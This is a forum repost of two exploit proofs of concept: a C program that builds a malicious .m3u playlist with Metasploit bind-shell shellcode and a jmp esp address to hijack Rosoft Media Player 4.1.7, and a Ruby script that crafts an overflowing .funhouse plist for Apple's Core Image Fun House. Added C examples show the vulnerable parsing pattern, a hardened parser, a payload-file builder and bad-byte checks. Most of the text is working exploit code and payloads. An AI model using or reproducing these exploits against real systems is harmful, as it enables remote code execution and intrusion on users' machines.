It's 2013 now
非安全中国网 disclaimer:
1. All statements and images in this post are solely the opinions of the poster and have nothing to do with this site's position;
2. This topic was posted by xiaomage, who complies with the six management rules of the "Copyright and Disclaimer Notice" and holds the corresponding rights;
3. Other organizations or individuals must obtain the consent of the poster xiaomage and of this site before using, reproducing or quoting this post;
4. Parts of this post are reproduced from other media and published here; the purpose of reproduction is to convey more information and does not imply that this site endorses their views or vouches for their accuracy;
5. If this post infringes the copyright of your site or of an individual, please notify this site immediately; it will be removed promptly with our sincere apologies;
6. Site administrators and moderators may delete this post without prior notice to the poster.

Rosoft Media Player 4.1.7 .m3u Stack Overflow Exploit
/* rosoft-player-expl.c: 2007-12-18:
 *
 * Copyright (c) 2007 devcode
 *
 *
 *          ^^ D E V C O D E ^^
 *
 * Rosoft Media Player <= 4.1.7 .M3U Stack Overflow
 * [0-DAY]
 *
 *
 * Description:
 *    A stack overflow occurs when parsing an .m3u file
 *    which does not contain any delimiters.
 *
 * Hotfix/Patch:
 *    None.
 *
 * Vulnerable systems:
 *    Rosoft Media Player <= 4.1.7
 *
 * Tested on:
 *    Rosoft Media Player 4.1.7
 *
 *    This is a PoC and was created for educational purposes only. The
 *    author is not held responsible if this PoC does not work or is
 *    used for any other purposes than the one stated above.
 *
 * Notes:
 *    Nothing much here, except the player itself is a piece of shit.
 *    The vulnerability was found by Juan Pablo Lopez Yacubian
 *    (jplopezy_at_gmail.com). Come to think of it, the entire suite
 *    of products offered by Rosoft Engineering sucks bawls.
 *
 */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* memset()/memcpy(); the header was missing in the posted copy */

/*
 * Invalid chars: 0x1A 0xA 0xD 0x00
 * win32_bind -
 * EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub
 * http://metasploit.com
 */
unsigned char uszShellcode[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x60"
    "\x90\xf0\xf7\x83\xeb\xfc\xe2\xf4\x9c\xfa\x1b\xba\x88\x69\x0f\x08"
    "\x9f\xf0\x7b\x9b\x44\xb4\x7b\xb2\x5c\x1b\x8c\xf2\x18\x91\x1f\x7c"
    "\x2f\x88\x7b\xa8\x40\x91\x1b\xbe\xeb\xa4\x7b\xf6\x8e\xa1\x30\x6e"
    "\xcc\x14\x30\x83\x67\x51\x3a\xfa\x61\x52\x1b\x03\x5b\xc4\xd4\xdf"
    "\x15\x75\x7b\xa8\x44\x91\x1b\x91\xeb\x9c\xbb\x7c\x3f\x8c\xf1\x1c"
    "\x63\xbc\x7b\x7e\x0c\xb4\xec\x96\xa3\xa1\x2b\x93\xeb\xd3\xc0\x7c"
    "\x20\x9c\x7b\x87\x7c\x3d\x7b\xb7\x68\xce\x98\x79\x2e\x9e\x1c\xa7"
    "\x9f\x46\x96\xa4\x06\xf8\xc3\xc5\x08\xe7\x83\xc5\x3f\xc4\x0f\x27"
    "\x08\x5b\x1d\x0b\x5b\xc0\x0f\x21\x3f\x19\x15\x91\xe1\x7d\xf8\xf5"
    "\x35\xfa\xf2\x08\xb0\xf8\x29\xfe\x95\x3d\xa7\x08\xb6\xc3\xa3\xa4"
    "\x33\xc3\xb3\xa4\x23\xc3\x0f\x27\x06\xf8\xe1\xab\x06\xc3\x79\x16"
    "\xf5\xf8\x54\xed\x10\x57\xa7\x08\xb6\xfa\xe0\xa6\x35\x6f\x20\x9f"
    "\xc4\x3d\xde\x1e\x37\x6f\x26\xa4\x35\x6f\x20\x9f\x85\xd9\x76\xbe"
    "\x37\x6f\x26\xa7\x34\xc4\xa5\x08\xb0\x03\x98\x10\x19\x56\x89\xa0"
    "\x9f\x46\xa5\x08\xb0\xf6\x9a\x93\x06\xf8\x93\x9a\xe9\x75\x9a\xa7"
    "\x39\xb9\x3c\x7e\x87\xfa\xb4\x7e\x82\xa1\x30\x04\xca\x6e\xb2\xda"
    "\x9e\xd2\xdc\x64\xed\xea\xc8\x5c\xcb\x3b\x98\x85\x9e\x23\xe6\x08"
    "\x15\xd4\x0f\x21\x3b\xc7\xa2\xa6\x31\xc1\x9a\xf6\x31\xc1\xa5\xa6"
    "\x9f\x40\x98\x5a\xb9\x95\x3e\xa4\x9f\x46\x9a\x08\x9f\xa7\x0f\x27"
    "\xeb\xc7\x0c\x74\xa4\xf4\x0f\x21\x32\x6f\x20\x9f\x8f\x5e\x10\x97"
    "\x33\x6f\x26\x08\xb0\x90\xf0\xf7";

int main( int argc, char **argv ) {
    FILE *f = NULL;
    char *p = NULL;

    printf( "\n        Rosoft Media Player <= 4.1.7 .M3U Stack Overflow\n\n" );
    printf( "                Copyright (c) 2007 devcode\n\n\n" );

    if ( argc < 2 ) {
        printf( "Usage: %s <file>\n", argv[0] );
        return -1;
    }

    /* "wb": binary mode, so the C runtime on Windows does not rewrite any
     * byte of the payload. The shellcode contains no 0x0A/0x0D anyway (see
     * the invalid-chars list above), so the bytes on disk are the same. */
    f = fopen( argv[1], "wb" );
    if ( !f ) {
        printf( "[-] Unable to create m3u file.\n" );
        return -1;
    }

    p = (char *)malloc( 5000 );
    if ( !p ) {
        fclose( f );
        return -1;
    }
    /* One long line of 'A's with no CR/LF: the player copies it as a single
     * playlist entry, which is what overruns the stack buffer. */
    memset( p, 0x41, 5000 );

    /*
     * We need a valid address here that contains
     * a value of 0 and is writable, and of course,
     * no 0x00s in the address itself. Try 0x1270FE0
     * if 0x7FFDFFF0 doesn't work.
     */
    memcpy( p+4096, "\xF0\xFF\xFD\x7F", 4 );

    /*
     * Windows XP SP2 Pro - jmp esp (0x7C941EED, ntdll.dll)
     */
    memcpy( p+4104, "\xED\x1E\x94\x7C", 4 );

    /* sizeof() includes the terminating NUL, so fputs() stops right after
     * the shellcode and nothing past it is written to the file. */
    memcpy( p+4108, uszShellcode, sizeof( uszShellcode ) );

    /*
     * Cleanup
     */
    fputs( p, f );
    fclose( f );
    free( p );

    printf( "\n  • File generated successfully!\n" );
    return 0;
}
Notice: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.
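The PoC header says the overflow happens when an .m3u file "does not contain any delimiters". The following is an added example, not Rosoft's code and not part of the original post: a minimal playlist-entry reader in the vulnerable shape (fixed stack buffer, copy bounded only by the next CR/LF), its hardened counterpart, and a builder for the delimiter-less file the PoC writes so the safe version can be shown rejecting it. The 260-byte buffer size, the function names and the sample playlist are assumptions chosen for illustration.

```c
/* m3u_entry.c: added example (not Rosoft's code). ENTRY_MAX, the parsing
 * routine and the sample playlist below are assumptions for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ENTRY_MAX 260   /* assumed MAX_PATH-sized stack buffer */

/* Length of the first playlist entry: bytes up to CR, LF, or end of data. */
static size_t m3u_entry_len(const char *data, size_t n)
{
    size_t i = 0;
    while (i < n && data[i] != '\n' && data[i] != '\r')
        i++;
    return i;
}

/* Vulnerable shape: the entry is copied into a fixed stack buffer and the
 * only thing bounding the copy is the delimiter. A file with no CR/LF makes
 * len equal to the whole file size and overwrites the frame above path[]
 * (saved EBP, return address, ...). Shown for the pattern only: it is not
 * called by main() and must never be run on untrusted input. */
int m3u_first_entry_vulnerable(const char *data, size_t n)
{
    char path[ENTRY_MAX];
    size_t len = m3u_entry_len(data, n);
    memcpy(path, data, len);       /* no check that len < sizeof path */
    path[len] = '\0';
    return (int)len;
}

/* Hardened form: the caller owns the output buffer and passes its size, an
 * entry that does not fit is rejected rather than silently truncated (a
 * truncated path is just a different bug), and the terminator is always
 * written. Returns the entry length, or -1 if the entry is too long. */
int m3u_first_entry_safe(const char *data, size_t n, char *out, size_t outsz)
{
    size_t len = m3u_entry_len(data, n);
    if (outsz == 0 || len >= outsz)
        return -1;
    memcpy(out, data, len);
    out[len] = '\0';
    return (int)len;
}

/* Build the delimiter-less playlist the PoC writes: `total` fill bytes with
 * a 32-bit value stored little-endian at `ret_off`. Caller frees the result;
 * returns NULL if the value would not fit. */
unsigned char *m3u_build_overlong(size_t total, size_t ret_off, unsigned int ret)
{
    unsigned char *buf;
    if (total < ret_off + 4)
        return NULL;
    buf = malloc(total);
    if (!buf)
        return NULL;
    memset(buf, 'A', total);
    buf[ret_off]     = (unsigned char)(ret & 0xff);
    buf[ret_off + 1] = (unsigned char)((ret >> 8) & 0xff);
    buf[ret_off + 2] = (unsigned char)((ret >> 16) & 0xff);
    buf[ret_off + 3] = (unsigned char)((ret >> 24) & 0xff);
    return buf;
}

int main(void)
{
    /* constructed sample playlist, two CRLF-terminated entries */
    const char normal[] = "C:\\music\\song.mp3\r\nC:\\music\\next.mp3\r\n";
    char out[ENTRY_MAX];
    unsigned char *evil = m3u_build_overlong(5000, 4104, 0x7C941EEDu);
    int r;

    r = m3u_first_entry_safe(normal, sizeof normal - 1, out, sizeof out);
    printf("normal entry: len=%d path=%s\n", r, out);

    if (evil) {
        r = m3u_first_entry_safe((const char *)evil, 5000, out, sizeof out);
        printf("5000-byte entry with no delimiter: rc=%d (rejected)\n", r);
        free(evil);
    }
    return 0;
}
```

The offsets used by the builder (4104 for the address, 5000 total) are the ones from the PoC above; the safe reader rejects that file at the length check, before any copy happens.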

    Core Image Fun House Arbitrary Code Execution PoC
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. adriel@netragard.com
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7:      'Z' <repeats 101 times>, "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
#        CFPropertyListCreateFromXMLData(): plist parse failed;
#        the data is not proper UTF-8. The file name for this data
#        could be:
#        /Users/test/Desktop/SuperTastey.funhouse/file.xml
#        The parser will retry as in 10.2, but the problem should be
#        corrected in the plist.
#
#  \x80-\xFF range that do not form proper utf8

len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d  # There are lots of filtered chars!

# Start from a clean bundle directory.
if File.exist?(fname + ".funhouse/file.xml")
  File.unlink(fname + ".funhouse/file.xml")
  Dir.rmdir(fname + ".funhouse")
end
Dir.mkdir(fname + ".funhouse")

# The .funhouse bundle is a plist; the overlong "file" string carries the
# return address, and the oversized inputTexture string pads the heap.
FUNSTUFF =
  '<?xml version="1.0" encoding="UTF-8"?>' +
  '<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" ' +
  '"http://www.apple.com/DTDs/PropertyList-1.0.dtd">' +
  '<plist version="1.0">' +
  "<dict>" +
  "<key>layers</key>" +
  "<array>" +
  "<dict>" +
  "<key>file</key>" +
  "<string>" +
  "Z" * len + [retaddr].pack("V") +
  "</string>" +
  "<key>offsetX</key>" +
  "<real>0.0</real>" +
  "<key>offsetY</key>" +
  "<real>0.0</real>" +
  "<key>type</key>" +
  "<string>image</string>" +
  "</dict>" +
  "<dict>" +
  "<key>classname</key>" +
  "<string>CIGlassDistortion</string>" +
  "<key>type</key>" +
  "<string>filter</string>" +
  "<key>values</key>" +
  "<dict>" +
  "<key>inputCenter_CIVectorValue</key>" +
  "<string>[150 150]</string>" +
  "<key>inputScale</key>" +
  "<real>200</real>" +
  "<key>inputTexture</key>" +
  "<string>" +
  "Z" * 50000 +
  "</string>" +
  "</dict>" +
  "</dict>" +
  "</array>" +
  "</dict>" +
  "</plist>" + "\n"

# The block form of File.open closes the file when the block ends; the
# closing brace was missing from the posted copy.
target_file = File.open(fname + ".funhouse/file.xml", "w+") { |f|
  f.print(FUNSTUFF)  # weeeeee... lets have fun.
}
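Both PoCs above are constrained by what the target parser will pass through: the Rosoft one lists the bytes its shellcode must avoid (0x1A, 0x0A, 0x0D, 0x00), and the Fun House one notes "lots of filtered chars" plus the CFLog complaint that bytes in the 0x80-0xFF range which do not form proper UTF-8 make the plist parse fail. The following is an added example, not part of either PoC and not Netragard's or devcode's code: a bad-byte scanner, a check for whether a little-endian address survives a given bad-byte list, and a UTF-8 well-formedness check of the kind a plist parser applies. The function names and the sample byte strings are assumptions constructed for illustration.

```c
/* badchars.c: added example, not from either PoC. Function names and the
 * sample buffers in main() are constructed for illustration. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Bad bytes from the Rosoft PoC's shellcode header. */
static const unsigned char M3U_BAD[] = { 0x1A, 0x0A, 0x0D, 0x00 };

/* Offset of the first byte of buf[] that appears in bad[], or -1 if none.
 * Use it on a shellcode or address before it goes into a file format that
 * treats those bytes as delimiters or terminators. */
long badchar_find(const unsigned char *buf, size_t n,
                  const unsigned char *bad, size_t nbad)
{
    size_t i, j;
    for (i = 0; i < n; i++)
        for (j = 0; j < nbad; j++)
            if (buf[i] == bad[j])
                return (long)i;
    return -1;
}

/* Lay a 32-bit address out little-endian (as pack("V") and the memcpy()s in
 * the PoCs do) and report whether all four bytes avoid bad[]. */
int addr_is_clean(uint32_t addr, const unsigned char *bad, size_t nbad)
{
    unsigned char le[4];
    le[0] = (unsigned char)(addr & 0xff);
    le[1] = (unsigned char)((addr >> 8) & 0xff);
    le[2] = (unsigned char)((addr >> 16) & 0xff);
    le[3] = (unsigned char)((addr >> 24) & 0xff);
    return badchar_find(le, 4, bad, nbad) < 0;
}

/* UTF-8 well-formedness: lead-byte ranges and continuation bytes per
 * RFC 3629 (rejects 0xC0, 0xC1, 0xF5..0xFF, stray continuation bytes and
 * truncated sequences). Overlong 3/4-byte forms and surrogates are not
 * checked; this is enough to show which raw bytes a plist parser that
 * insists on UTF-8 will refuse. Returns 1 if well-formed, else 0. */
int utf8_wellformed(const unsigned char *s, size_t n)
{
    size_t i = 0;
    while (i < n) {
        unsigned char c = s[i];
        size_t len, k;
        if (c < 0x80)                              len = 1;
        else if ((c & 0xE0) == 0xC0 && c >= 0xC2)  len = 2;
        else if ((c & 0xF0) == 0xE0)               len = 3;
        else if ((c & 0xF8) == 0xF0 && c <= 0xF4)  len = 4;
        else return 0;                /* 0x80..0xC1 or 0xF5..0xFF as lead byte */
        if (i + len > n)
            return 0;                 /* sequence cut off by end of data */
        for (k = 1; k < len; k++)
            if ((s[i + k] & 0xC0) != 0x80)
                return 0;             /* expected a 10xxxxxx continuation byte */
        i += len;
    }
    return 1;
}

int main(void)
{
    /* constructed: the addresses used by the two PoCs, plus one that fails */
    const uint32_t addrs[] = { 0x7C941EEDu, 0x7FFDFFF0u, 0x01270FE0u, 0x7C940D00u };
    /* constructed: a fake "shellcode" with a 0x0A in it */
    const unsigned char sc[] = { 0x90, 0x90, 0x31, 0xC0, 0x0A, 0x41 };
    /* constructed: plist string bytes, one ASCII, one with a raw 0x90 */
    const unsigned char plist_ok[]  = { 'Z', 'Z', 0x0D, 0x0D, 0x0D, 0x0D };
    const unsigned char plist_bad[] = { 'Z', 'Z', 0x90, 0x41 };
    size_t i;

    for (i = 0; i < sizeof addrs / sizeof addrs[0]; i++)
        printf("0x%08X: %s\n", addrs[i],
               addr_is_clean(addrs[i], M3U_BAD, sizeof M3U_BAD) ? "clean" : "contains a bad byte");

    printf("shellcode bad byte at offset %ld\n",
           badchar_find(sc, sizeof sc, M3U_BAD, sizeof M3U_BAD));
    printf("plist string (0x0d0d0d0d packed) utf8=%d\n",
           utf8_wellformed(plist_ok, sizeof plist_ok));
    printf("plist string with raw 0x90 utf8=%d\n",
           utf8_wellformed(plist_bad, sizeof plist_bad));
    return 0;
}
```

Two things fall out of running it: every address the Rosoft PoC proposes (0x7C941EED, 0x7FFDFFF0, 0x1270FE0) is free of its four bad bytes, and the Fun House return address 0x0d0d0d0d packs to four 0x0D bytes, which are ASCII and so pass the UTF-8 check, whereas any single raw byte in 0x80-0xFF that is not part of a multi-byte sequence makes the whole string ill-formed, which is the failure the CFLog line reports.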

Heh, everyone curious? Come and have a look~~~~